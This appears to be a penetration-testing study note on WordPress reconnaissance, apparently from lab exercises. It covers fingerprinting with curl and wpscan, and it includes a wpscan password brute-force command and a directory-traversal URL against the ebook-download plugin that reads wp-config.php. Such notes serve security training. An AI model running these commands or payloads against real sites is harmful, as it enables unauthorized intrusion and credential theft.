Wordpress
Wordpress enumeration manually
Browsing to Robot.txt file to identify a Wordpress site. The content of such file looks like this in Wordpress:
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/
Sitemap: https://inlanefreight.local/wp-sitemap.xmlInteresting files and folders:
wp-content/plugins
Plugins are stored here
wp-content/themes
Themes are stored in this directory
#Identify Wordpress
curl -s http://blog.inlanefreight.local | grep WordPress
<meta name="generator" content="WordPress 5.8" /
# msf module to enumerate logged on users on wordpress
Use auxiliary/scanner/http/wordpress_login_enum
Identify Themes
curl -s http://blog.inlanefreight.local/ | grep themesIdentify Plugins
curl -s http://blog.inlanefreight.local/ | grep pluginsIdentify the plugins version
Brows to the plugin identified (e.g.: http://blog.inlanefreight.local/wp-content/plugins/mail-masta/)
Identify readme.txt and extract version number and any other helpful information from it
Enumerating users
Attacks
# Perform brute force attack to crack WordPress password. Uses common passwords from a predefined list.
wpscan --url http://172.25.210.128 -U psychotic_animal -P /usr/share/seclists/Passwords/xa
# Directory traversal on a vulnerable wordpress plugin. This approach uses the 'ebook-download' plugin to access sensitive files.
http://www.cpent.com/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.phpWPSCAN
Wpscan helps to identify Wordpress version, plugins, themes and vulnerabilities automatically and must faster than manually:
Enumeration
Use WPSCAN with an API token to get the identified vulnerabilities. You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
#Enumerate everything
wpscan --url http://blog.inlanefreight.local/ --enumerate --api-token<SNIP>
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://blog.inlanefreight.local/ [10.129.1.169]
[+] Started: Wed Oct 15 05:16:04 2025
Identify themes/plugins
# Use the API token for authenticated scanning of WordPress plugins.
wpscan --url http://172.25.210.128 --api-token <API Token Here>
# Enumerate WordPress plugins on the given URL to identify potential vulnerabilities.
wpscan --url http://www.cpent.com --enumerate p
wpscan --url http://www.cpent.com --enumerate tNote down all interesting findings from your enumeration phase before starting exploitation phase
Last updated